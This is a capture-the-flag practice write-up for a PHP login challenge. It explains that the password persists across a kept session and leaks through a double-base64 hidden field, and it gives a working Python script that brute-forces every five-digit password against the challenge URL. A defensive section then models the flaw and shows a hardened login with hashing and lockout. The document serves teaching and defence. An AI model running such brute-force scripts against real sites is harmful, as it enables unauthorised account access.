GJCTF practice problem: brute-forcing a site's administrator password with Python

Challenge URL: http://www.czlgjbbq.top/GJCTF/brute.php

PHP source:

<?php
error_reporting(0);
session_start();
// A new 5-digit "password" is generated only when the f14g cookie or the
// session token is missing. A client that keeps both never sees it change.
if(empty($_COOKIE['f14g']) || empty($_SESSION['token'])){
    $rand_number = rand(10000,99999);
    setcookie('f14g',1);
    // The token is the password encoded twice with base64, not a hash of it.
    $_SESSION['token'] = base64_encode(base64_encode($rand_number));
}
echo "當前session值:".$_SESSION['token'];
?>
<html>
<head><title>你能進來嗎?</title></head>
<body>
<form action="./brute.php" method="GET">
    <input type="text" name="password" placeholder="請輸入五位數密碼!" value="">
    <!-- the session token is echoed to the client as a hidden field -->
    <input type="hidden" name="check" value="<?php echo $_SESSION['token'];?>">
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

<?php
// The check field must echo back the current token; the password must equal
// the token decoded twice. Note the loose (==) comparisons.
if($_SESSION['token'] == $_GET['check']){
    $password = $_GET['password'];
    echo $password;
    if($password == base64_decode(base64_decode($_SESSION['token']))){
        echo "flag:GJCTF{anjjPONFAkg};";
    }else{
        echo "error!";
    }
}else{
    echo "session error!";
}
?>

From the source we can see that the token (and with it the password) is only regenerated when the f14g cookie or the session token is absent. If we keep the same session across requests, the password never changes, and the five-digit space can be searched. So we use a Python script with a requests.Session object, which stores the cookies and thus keeps the back-end administrator password from being regenerated.

Python script:

import re
import requests

URL = 'http://www.czlgjbbq.top/GJCTF/brute.php'

# One requests.Session keeps the PHPSESSID and f14g cookies, so the server
# never re-enters the block that generates a new token/password.
s = requests.session()
html = s.get(URL)

# The current token is echoed into the hidden "check" field of the form.
m = re.search(r'name="check" value="([^"]*)"', html.text)
session = m.group(1)
# print(session)

for i in range(10000, 100000):      # every five-digit number, 99999 included
    payload = {'password': str(i), 'check': session}
    # print(payload)
    html = s.get(url=URL, params=payload)
    # re.match only matches at the start of the text; the flag appears
    # after the echoed token, so test for the substring instead.
    if 'GJCTF{' in html.text:
        print(html.text)
        break
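Added example (not part of the original write-up): a Python model of the check performed by the PHP source above, next to a hardened variant. It shows the root causes from a defender's point of view: the hidden check field is a reversible encoding of the password, so the secret is client-visible; the password space is only five digits; and nothing limits the number of attempts. The HardenedLogin class, the PBKDF2 parameters and the MAX_ATTEMPTS value are my own choices and are not taken from the challenge.

```python
import base64
import hashlib
import hmac
import secrets


# --- Model of the challenge's server logic (mirrors the PHP above) ---

def make_challenge_token(password: int) -> str:
    """PHP stores base64(base64(rand)) in the session and echoes it into the form."""
    once = base64.b64encode(str(password).encode()).decode()
    return base64.b64encode(once.encode()).decode()


def password_from_token(token: str) -> str:
    """The same value decoded twice: the hidden field fully determines the password."""
    return base64.b64decode(base64.b64decode(token)).decode()


def challenge_login(session_token: str, check: str, password: str) -> str:
    """Same decision sequence as brute.php; no attempt limit, token derived from the secret."""
    if session_token != check:
        return "session error!"
    if password == password_from_token(session_token):
        return "flag:GJCTF{...}"   # placeholder, the real flag is only on the challenge site
    return "error!"


# --- Hardened variant (added here; design choices are mine) ---

class HardenedLogin:
    MAX_ATTEMPTS = 5          # lock the session after this many failures
    PBKDF2_ROUNDS = 100_000   # illustrative; tune for the deployment

    def __init__(self, password: str):
        # Store a salted hash, never anything the password can be recovered from.
        self._salt = secrets.token_bytes(16)
        self._hash = hashlib.pbkdf2_hmac("sha256", password.encode(), self._salt, self.PBKDF2_ROUNDS)
        # The form token is random and unrelated to the password, so echoing it leaks nothing.
        self.form_token = secrets.token_urlsafe(32)
        self.attempts = 0

    def login(self, check: str, password: str) -> str:
        # Constant-time comparison instead of PHP's loose ==.
        if not hmac.compare_digest(check, self.form_token):
            return "session error!"
        if self.attempts >= self.MAX_ATTEMPTS:
            return "locked"
        self.attempts += 1
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), self._salt, self.PBKDF2_ROUNDS)
        if hmac.compare_digest(candidate, self._hash):
            self.attempts = 0
            return "ok"
        return "error!"


if __name__ == "__main__":
    # Constructed sample: a token the challenge would emit for the password 54321.
    tok = make_challenge_token(54321)
    print("challenge token:", tok, "-> decodes to", password_from_token(tok))
    h = HardenedLogin("54321")
    for guess in ("00000", "11111", "22222", "33333", "44444", "54321"):
        print(guess, "->", h.login(h.form_token, guess))
```

The first half makes the design flaw concrete: the value the server sends to every client already contains the password, so the five-digit search in the write-up is only one of two ways in. The hardened class removes both: the token is random and independent of the credential, the credential is stored as a salted PBKDF2 hash, comparisons are constant-time, and the session is locked after a small number of failures, which is what makes a 90,000-candidate search impractical.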